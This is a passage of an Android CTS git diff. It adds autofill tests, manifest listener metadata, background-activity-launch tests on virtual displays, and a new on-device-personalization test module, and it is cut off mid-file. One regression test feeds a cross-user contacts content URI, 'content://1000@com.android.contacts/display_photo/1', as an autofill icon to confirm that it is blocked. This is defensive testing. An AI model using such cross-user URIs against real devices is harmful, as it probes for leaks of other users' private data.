+                    .setField(ID_PASSWORD, "sweet")
+                    .setPresentation(createPresentation("Dropdown Presentation"))
+                    .setDialogPresentation(dialogRv)
+                    .build())
+                .setDialogHeader(header)
+                .setDialogTriggerIds(ID_PASSWORD);
+        sReplier.addResponse(builder.build());
+
+        // Start activity and autofill
+        LoginActivity activity = startLoginActivity();
+        mUiBot.waitForIdleSync();
+
+        sReplier.getNextFillRequest();
+        mUiBot.waitForIdleSync();
+
+        // Click on password field to trigger fill dialog
+        mUiBot.selectByRelativeId(ID_PASSWORD);
+        mUiBot.waitForIdleSync();
+
+        // Asserts that the header is not shown
+        assertThrows(RetryableException.class,
+                () -> mUiBot.findFillDialogHeaderPicker());
+
+        // Asserts that the
+        assertThrows(RetryableException.class,
+                () -> mUiBot.findFillDialogDatasetPicker());
+    }
+
     private FieldsNoPasswordActivity startNoPasswordActivity() throws Exception {
         final Intent intent = new Intent(mContext, FieldsNoPasswordActivity.class)
                 .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
diff --git a/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java b/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
index 96ebd3f..15fc1ed 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/dropdown/LoginActivityTest.java
@@ -75,6 +75,8 @@
 import static com.google.common.truth.Truth.assertThat;
 import static com.google.common.truth.Truth.assertWithMessage;
 
+import static org.junit.Assert.assertThrows;
+
 import android.app.PendingIntent;
 import android.app.assist.AssistStructure.ViewNode;
 import android.autofillservice.cts.R;
@@ -104,6 +106,7 @@
 import android.content.IntentSender;
 import android.graphics.Color;
 import android.graphics.Rect;
+import android.graphics.drawable.Icon;
 import android.os.Bundle;
 import android.os.SystemClock;
 import android.platform.test.annotations.AppModeFull;
@@ -1468,6 +1471,46 @@
         mActivity.assertAutoFilled();
     }
 
+    @Test
+    public void remoteViews_doesNotSpillAcrossUsers() throws Exception {
+        // Set service.
+        enableService();
+
+
+        RemoteViews firstRv = createPresentation("hello");
+        RemoteViews secondRv = createPresentation("world");
+
+        // bad url, should not be displayed
+        firstRv.setImageViewIcon(R.id.icon,
+                Icon.createWithContentUri("content://1000@com.android.contacts/display_photo/1"));
+        secondRv.setImageViewIcon(R.id.icon,
+                Icon.createWithContentUri("content://1000@com.android.contacts/display_photo/1"));
+
+        // Set expectations.
+        sReplier.addResponse(new CannedFillResponse.Builder()
+                .addDataset(new CannedDataset.Builder()
+                    .setField(ID_USERNAME, "dude", firstRv)
+                    .setField(ID_PASSWORD, "sweet", secondRv)
+                    .build())
+                .setHeader(firstRv)
+                .setFooter(secondRv)
+                .build());
+
+        mActivity.expectAutoFill("dude", "sweet");
+
+        // Trigger auto-fill.
+        mActivity.onUsername(View::requestFocus);
+        sReplier.getNextFillRequest();
+
+        // Assert that the dataset is not shown
+        assertThrows(RetryableException.class,
+                () -> mUiBot.assertDatasets("The Dude"));
+
+        // Assert that header/footer is not shown
+        assertThrows(RetryableException.class,
+                () -> mUiBot.assertDatasetsWithBorders("hello", "world", "The Dude"));
+    }
+
     /**
      * Tests the scenario where the service uses custom remote views for different fields (username
      * and password), but each dataset has a different number of fields.
diff --git a/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java b/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
index fb7ac1c..e10c9c2 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/testcore/UiBot.java
@@ -1477,11 +1477,11 @@
         return waitForObject(FILL_DIALOG_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
     }
 
-    private UiObject2 findFillDialogDatasetPicker() throws Exception {
+    public UiObject2 findFillDialogDatasetPicker() throws Exception {
         return waitForObject(FILL_DIALOG_DATASET_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
     }
 
-    private UiObject2 findFillDialogHeaderPicker() throws Exception {
+    public UiObject2 findFillDialogHeaderPicker() throws Exception {
         return waitForObject(FILL_DIALOG_HEADER_SELECTOR, UI_DATASET_PICKER_TIMEOUT);
     }
 
diff --git a/tests/backup/AndroidManifest.xml b/tests/backup/AndroidManifest.xml
index cf8d2e0..71a0925 100644
--- a/tests/backup/AndroidManifest.xml
+++ b/tests/backup/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.backup.cts"
                      android:label="CTS tests of Android Backup/Restore">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/camera/AndroidManifest.xml b/tests/camera/AndroidManifest.xml
index 9e460ae..8fa1087 100644
--- a/tests/camera/AndroidManifest.xml
+++ b/tests/camera/AndroidManifest.xml
@@ -130,6 +130,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.camera.cts"
                      android:label="CTS tests of android camera">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java b/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
index 2545ad2..4fe8168 100644
--- a/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
+++ b/tests/devicepolicy/src/android/devicepolicy/cts/PermissionGrantTest.java
@@ -33,10 +33,13 @@
 import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_AUTO_DENY;
 import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_AUTO_GRANT;
 import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_PROMPT;
+
 import static com.android.bedstead.harrier.UserType.WORK_PROFILE;
 import static com.android.bedstead.nene.utils.Versions.U;
+
 import static com.google.common.truth.Truth.assertThat;
 import static com.google.common.truth.Truth.assertWithMessage;
+
 import static org.junit.Assume.assumeFalse;
 import static org.junit.Assume.assumeTrue;
 import static org.testng.Assert.assertThrows;
@@ -45,6 +48,7 @@
 import android.app.admin.RemoteDevicePolicyManager;
 import android.content.ComponentName;
 import android.provider.Settings;
+
 import com.android.bedstead.harrier.BedsteadJUnit4;
 import com.android.bedstead.harrier.DeviceState;
 import com.android.bedstead.harrier.annotations.AfterClass;
@@ -77,8 +81,7 @@
 import com.android.bedstead.testapp.TestAppInstance;
 import com.android.queryable.annotations.IntegerQuery;
 import com.android.queryable.annotations.Query;
-import java.lang.annotation.Retention;
-import java.lang.annotation.RetentionPolicy;
+
 import org.junit.Assume;
 import org.junit.Before;
 import org.junit.ClassRule;
@@ -87,6 +90,9 @@
 import org.junit.Test;
 import org.junit.runner.RunWith;
 
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+
 @RunWith(BedsteadJUnit4.class)
 public final class PermissionGrantTest {
 
diff --git a/tests/framework/base/biometrics/AndroidManifest.xml b/tests/framework/base/biometrics/AndroidManifest.xml
index f79f3d3..67a070d 100644
--- a/tests/framework/base/biometrics/AndroidManifest.xml
+++ b/tests/framework/base/biometrics/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.server.biometrics.cts"
         android:label="CTS tests for Biometrics">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/framework/base/locale/AndroidManifest.xml b/tests/framework/base/locale/AndroidManifest.xml
index eeff77a..7fd1ef5 100644
--- a/tests/framework/base/locale/AndroidManifest.xml
+++ b/tests/framework/base/locale/AndroidManifest.xml
@@ -37,6 +37,8 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
       android:targetPackage="android.localemanager.cts"
       android:label="CTS tests for android.localemanager">
+    <meta-data android:name="listener"
+        android:value="com.android.cts.runner.CtsTestRunListener"/>
   </instrumentation>
 
 </manifest>
diff --git a/tests/framework/base/localeconfig/AndroidManifest.xml b/tests/framework/base/localeconfig/AndroidManifest.xml
index d931a28..6f23b37 100644
--- a/tests/framework/base/localeconfig/AndroidManifest.xml
+++ b/tests/framework/base/localeconfig/AndroidManifest.xml
@@ -28,5 +28,7 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
       android:targetPackage="com.android.cts.localeconfig"
       android:label="CTS tests for android.app.LocaleConfig">
+    <meta-data android:name="listener"
+        android:value="com.android.cts.runner.CtsTestRunListener"/>
   </instrumentation>
 </manifest>
diff --git a/tests/framework/base/suggestions/AndroidManifest.xml b/tests/framework/base/suggestions/AndroidManifest.xml
index 8f61c062..85e7f34 100644
--- a/tests/framework/base/suggestions/AndroidManifest.xml
+++ b/tests/framework/base/suggestions/AndroidManifest.xml
@@ -29,6 +29,8 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.service.settings.suggestions.cts"
         android:label="CTS tests of android.service.settings.suggestions">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
index 22289d8..cf59443 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
@@ -108,6 +108,12 @@
                 "START_ACTIVITY_FROM_FG_ACTIVITY_DELAY_MS_EXTRA";
     }
 
+    /** Extra key constants for {@link #VIRTUAL_DISPLAY_ACTIVITY} */
+    public static class VirtualDisplayActivityExtra {
+        public final String USE_PUBLIC_PRESENTATION =
+                "USE_PUBLIC_PRESENTATION_EXTRA";
+    }
+
     // TODO(b/263368846) rename to camelCase
     public final String APP_PACKAGE_NAME;
     public final ComponentName BACKGROUND_ACTIVITY;
@@ -138,6 +144,9 @@
     public final StartActivityReceiverExtra START_ACTIVITY_RECEIVER_EXTRA =
             new StartActivityReceiverExtra();
 
+    public final VirtualDisplayActivityExtra VIRTUAL_DISPLAY_ACTIVITY_EXTRA =
+            new VirtualDisplayActivityExtra();
+
     public Components(String appPackageName) {
         APP_PACKAGE_NAME = appPackageName;
 
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
index 5461305..bb25cac 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
@@ -26,7 +26,23 @@
     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
-        createVirtualDisplayAndShowPresentation();
+        Components appA = Components.get(getApplicationContext());
+        boolean usePublicPresentation = getIntent().getBooleanExtra(
+                appA.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, false);
+        if (usePublicPresentation) {
+            createPublicVirtualDisplayAndShowPresentation();
+        } else {
+            createVirtualDisplayAndShowPresentation();
+        }
+    }
+
+    private void createPublicVirtualDisplayAndShowPresentation() {
+        VirtualDisplay virtualDisplay = getSystemService(DisplayManager.class).createVirtualDisplay(
+                "VirtualDisplay1", 10, 10, 10, null,
+                DisplayManager.VIRTUAL_DISPLAY_FLAG_PUBLIC
+                        + DisplayManager.VIRTUAL_DISPLAY_FLAG_PRESENTATION
+                        + DisplayManager.VIRTUAL_DISPLAY_FLAG_OWN_CONTENT_ONLY);
+        new Presentation(getBaseContext(), virtualDisplay.getDisplay()).show();
     }
 
     private void createVirtualDisplayAndShowPresentation() {
diff --git a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
index a01c23d..05293de 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
@@ -751,10 +751,31 @@
 
     // Check that a presentation on a virtual display won't allow BAL after pressing home.
     @Test
-    public void testVirtualDisplayCannotStartAfterHomeButton() throws Exception {
+    public void testPrivateVirtualDisplayCannotStartAfterHomeButton() throws Exception {
         Intent intent = new Intent();
         intent.setComponent(APP_A.VIRTUAL_DISPLAY_ACTIVITY);
         intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+        intent.putExtra(APP_A.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, false);
+        mContext.startActivity(intent);
+
+        assertTrue("VirtualDisplay activity not started", waitUntilForegroundChanged(
+                APP_A.APP_PACKAGE_NAME, true, ACTIVITY_START_TIMEOUT_MS));
+
+        // Click home button, and test app activity onPause() will trigger which tries to launch
+        // the background activity.
+        pressHomeAndWaitHomeResumed();
+
+        boolean result = waitForActivityFocused(APP_A.BACKGROUND_ACTIVITY);
+        assertFalse("Should not able to launch background activity", result);
+    }
+
+    // Check that a presentation on a virtual display won't allow BAL after pressing home.
+    @Test
+    public void testPublicVirtualDisplayCannotStartAfterHomeButton() throws Exception {
+        Intent intent = new Intent();
+        intent.setComponent(APP_A.VIRTUAL_DISPLAY_ACTIVITY);
+        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+        intent.putExtra(APP_A.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, true);
         mContext.startActivity(intent);
 
         assertTrue("VirtualDisplay activity not started", waitUntilForegroundChanged(
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java b/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
index 4513571..b6eea5a 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
@@ -43,7 +43,6 @@
 import android.content.Context;
 import android.content.Intent;
 import android.content.pm.ActivityInfo;
-import android.graphics.Rect;
 import android.os.Bundle;
 import android.server.wm.MultiDisplayTestBase;
 import android.server.wm.ObjectTracker;
@@ -623,18 +622,6 @@
             Activity secondaryActivity) throws Exception {
         getTransitionLog().clear();
 
-        final int screenwidth = mWm.getDefaultDisplay().getWidth();
-        final int screenheight = mWm.getDefaultDisplay().getHeight();
-
-        mTaskOrganizer.registerOrganizerIfNeeded();
-        Rect primaryTaskBounds = mTaskOrganizer.getPrimaryTaskBounds();
-        if (screenheight > screenwidth) {
-            primaryTaskBounds.bottom = primaryTaskBounds.width() / 2;
-        } else {
-            primaryTaskBounds.right = primaryTaskBounds.height() / 2;
-        }
-        mTaskOrganizer.setRootPrimaryTaskBounds(primaryTaskBounds);
-
         mWmState.computeState(secondaryActivity.getComponentName());
         moveActivitiesToSplitScreen(primaryActivity.getComponentName(),
                 secondaryActivity.getComponentName());
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
index eb895ea..f04284c 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
@@ -305,7 +305,7 @@
         }
     }
 
-    public void setRootPrimaryTaskBounds(Rect bounds) {
+    void setRootPrimaryTaskBounds(Rect bounds) {
         setTaskBounds(mRootPrimary.getToken(), bounds);
     }
 
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
index 913b039..b2a8520 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
@@ -379,9 +379,10 @@
         }, message);
     }
 
-    public void waitForFocusedActivity(final String msg, final ComponentName activityName) {
+    public boolean waitForFocusedActivity(final String msg, final ComponentName activityName) {
         final String activityComponentName = getActivityName(activityName);
-        waitFor(msg, wmState -> Objects.equals(activityComponentName, wmState.getFocusedActivity())
+        return waitFor(msg, wmState ->
+                Objects.equals(activityComponentName, wmState.getFocusedActivity())
                 && Objects.equals(activityComponentName, wmState.getFocusedApp()));
     }
 
diff --git a/tests/inputmethod/AndroidManifest.xml b/tests/inputmethod/AndroidManifest.xml
index 1687d15..4d83f06 100644
--- a/tests/inputmethod/AndroidManifest.xml
+++ b/tests/inputmethod/AndroidManifest.xml
@@ -74,6 +74,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:label="CTS tests of android.view.inputmethod"
          android:targetPackage="android.view.inputmethod.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/leanbackjank/AndroidManifest.xml b/tests/leanbackjank/AndroidManifest.xml
index 560b5ca..2b1f1a6 100644
--- a/tests/leanbackjank/AndroidManifest.xml
+++ b/tests/leanbackjank/AndroidManifest.xml
@@ -28,6 +28,8 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.leanbackjank.cts"
                    android:label="LeanbackJank tests">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/location/location_coarse/AndroidManifest.xml b/tests/location/location_coarse/AndroidManifest.xml
index dc55f8e6..1707b11 100644
--- a/tests/location/location_coarse/AndroidManifest.xml
+++ b/tests/location/location_coarse/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for android.location"
                      android:targetPackage="android.location.cts.coarse" >
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/location/location_fine/AndroidManifest.xml b/tests/location/location_fine/AndroidManifest.xml
index ec33245..093c0fa 100644
--- a/tests/location/location_fine/AndroidManifest.xml
+++ b/tests/location/location_fine/AndroidManifest.xml
@@ -37,6 +37,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.location.cts.fine"
                      android:label="CTS tests for android.location">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/location/location_gnss/AndroidManifest.xml b/tests/location/location_gnss/AndroidManifest.xml
index c83b49c..49f1368 100644
--- a/tests/location/location_gnss/AndroidManifest.xml
+++ b/tests/location/location_gnss/AndroidManifest.xml
@@ -39,6 +39,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for android.location that require GNSS signal"
                      android:targetPackage="android.location.cts.gnss" >
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/location/location_none/AndroidManifest.xml b/tests/location/location_none/AndroidManifest.xml
index 75dfa93..957aeeb 100644
--- a/tests/location/location_none/AndroidManifest.xml
+++ b/tests/location/location_none/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for android.location"
                      android:targetPackage="android.location.cts.none" >
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/location/location_privileged/AndroidManifest.xml b/tests/location/location_privileged/AndroidManifest.xml
index c5c71bf..a0200fa 100644
--- a/tests/location/location_privileged/AndroidManifest.xml
+++ b/tests/location/location_privileged/AndroidManifest.xml
@@ -28,6 +28,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:label="CTS tests for android.location"
                      android:targetPackage="android.location.cts.privileged" >
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/media/AndroidManifest.xml b/tests/media/AndroidManifest.xml
index 711f1c3..0a1f5e0 100644
--- a/tests/media/AndroidManifest.xml
+++ b/tests/media/AndroidManifest.xml
@@ -36,6 +36,9 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.mediav2.cts"
             android:label="CTS MediaV2 tests of android.media" >
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/mediapc/AndroidManifest.xml b/tests/mediapc/AndroidManifest.xml
index 5a045d8..bbb1934 100644
--- a/tests/mediapc/AndroidManifest.xml
+++ b/tests/mediapc/AndroidManifest.xml
@@ -37,5 +37,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.mediapc.cts"
             android:label="CTS MediaPerformanceClass tests of android.media" >
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/mocking/AndroidManifest.xml b/tests/mocking/AndroidManifest.xml
index c1736fc..d0f9e00 100644
--- a/tests/mocking/AndroidManifest.xml
+++ b/tests/mocking/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.mocking.cts"
                      android:label="CTS tests for mockito mocking">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/mocking/debuggable/AndroidManifest.xml b/tests/mocking/debuggable/AndroidManifest.xml
index cca80f5..3ca5af9 100644
--- a/tests/mocking/debuggable/AndroidManifest.xml
+++ b/tests/mocking/debuggable/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.mocking.cts.debuggable"
                      android:label="CTS tests for mockito mocking (while debuggable)">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/mocking/extended/AndroidManifest.xml b/tests/mocking/extended/AndroidManifest.xml
index a50e23a..36bd152 100644
--- a/tests/mocking/extended/AndroidManifest.xml
+++ b/tests/mocking/extended/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.extended.mocking.cts"
                      android:label="CTS tests for mockito extended mocking">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/mocking/inline/AndroidManifest.xml b/tests/mocking/inline/AndroidManifest.xml
index b5b2d08..4bb4085 100644
--- a/tests/mocking/inline/AndroidManifest.xml
+++ b/tests/mocking/inline/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.inline.mocking.cts"
                      android:label="CTS tests for mockito inline mocking">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/ondevicepersonalization/Android.bp b/tests/ondevicepersonalization/Android.bp
new file mode 100644
index 0000000..738effe
--- /dev/null
+++ b/tests/ondevicepersonalization/Android.bp
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test {
+    name: "CtsOnDevicePersonalizationTestCases",
+    defaults: [
+        "cts_defaults",
+        "framework-ondevicepersonalization-cts-defaults",
+    ],
+    // Tag this module as a cts test artifact
+    test_suites: [
+        "cts",
+        "general-tests",
+        "mts-ondevicepersonalization",
+    ],
+    libs: [
+        "android.test.runner",
+    ],
+    static_libs: [
+        "androidx.test.ext.junit",
+        "ctstestrunner-axt",
+        "compatibility-device-util-axt",
+        "mockito-target-minus-junit4",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    platform_apis: false,
+}
diff --git a/tests/ondevicepersonalization/AndroidManifest.xml b/tests/ondevicepersonalization/AndroidManifest.xml
new file mode 100644
index 0000000..8016e92
--- /dev/null
+++ b/tests/ondevicepersonalization/AndroidManifest.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.ondevicepersonalization.cts">
+
+    <!--  self-instrumenting test package. -->
+    <instrumentation
+        android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:label="CTS tests for android.ondevicepersonalization"
+        android:targetPackage="android.ondevicepersonalization.cts" >
+    </instrumentation>
+</manifest>
diff --git a/tests/ondevicepersonalization/AndroidTest.xml b/tests/ondevicepersonalization/AndroidTest.xml
new file mode 100644
index 0000000..1ca3ae6
--- /dev/null
+++ b/tests/ondevicepersonalization/AndroidTest.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2022 The Android Open Source Project
+
+     Licensed under the Apache License, Version 2.0 (the "License");
+     you may not use this file except in compliance with the License.
+     You may obtain a copy of the License at
+
+          http://www.apache.org/licenses/LICENSE-2.0
+
+     Unless required by applicable law or agreed to in writing, software
+     distributed under the License is distributed on an "AS IS" BASIS,
+     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+     See the License for the specific language governing permissions and
+     limitations under the License.
+-->
+<configuration description="Config for CTS OnDevicePersonalization test cases">
+    <option name="test-suite-tag" value="cts" />
+    <option name="config-descriptor:metadata" key="component" value="framework" />
+    <option name="config-descriptor:metadata" key="parameter" value="instant_app" />
+    <option name="config-descriptor:metadata" key="parameter" value="not_multi_abi" />
+    <option name="config-descriptor:metadata" key="parameter" value="secondary_user" />
+    <option name="config-descriptor:metadata" key="mainline-param" value="com.google.android.ondevicepersonalization.apex" />
+
+    <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+        <option name="cleanup-apks" value="true" />
+        <option name="test-file-name" value="CtsOnDevicePersonalizationTestCases.apk" />
+    </target_preparer>
+
+    <test class="com.android.tradefed.testtype.AndroidJUnitTest" >
+        <option name="package" value="android.ondevicepersonalization.cts" />
+        <option name="hidden-api-checks" value="false" />
+    </test>
+
+    <object type="module_controller" class="com.android.tradefed.testtype.suite.module.MainlineTestModuleController">
+        <option name="mainline-module-package-name" value="com.google.android.ondevicepersonalization" />
+    </object>
+</configuration>
\ No newline at end of file
diff --git a/tests/ondevicepersonalization/OWNERS b/tests/ondevicepersonalization/OWNERS
new file mode 100644
index 0000000..57cdbaf
--- /dev/null
+++ b/tests/ondevicepersonalization/OWNERS
@@ -0,0 +1,2 @@
+# Bug component: 1117807
+include platform/packages/modules/OnDevicePersonalization:/OWNERS
\ No newline at end of file
diff --git a/tests/ondevicepersonalization/TEST_MAPPING b/tests/ondevicepersonalization/TEST_MAPPING
new file mode 100644
index 0000000..8d96b25
--- /dev/null
+++ b/tests/ondevicepersonalization/TEST_MAPPING
@@ -0,0 +1,7 @@
+{
+  "presubmit": [
+    {
+        "name": "CtsOnDevicePersonalizationTestCases"
+    }
+  ]
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
similarity index 65%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
index 4416990..c82e039 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
@@ -14,9 +14,17 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.ondevicepersonalization.cts;
 
-import android.app.Activity;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
 
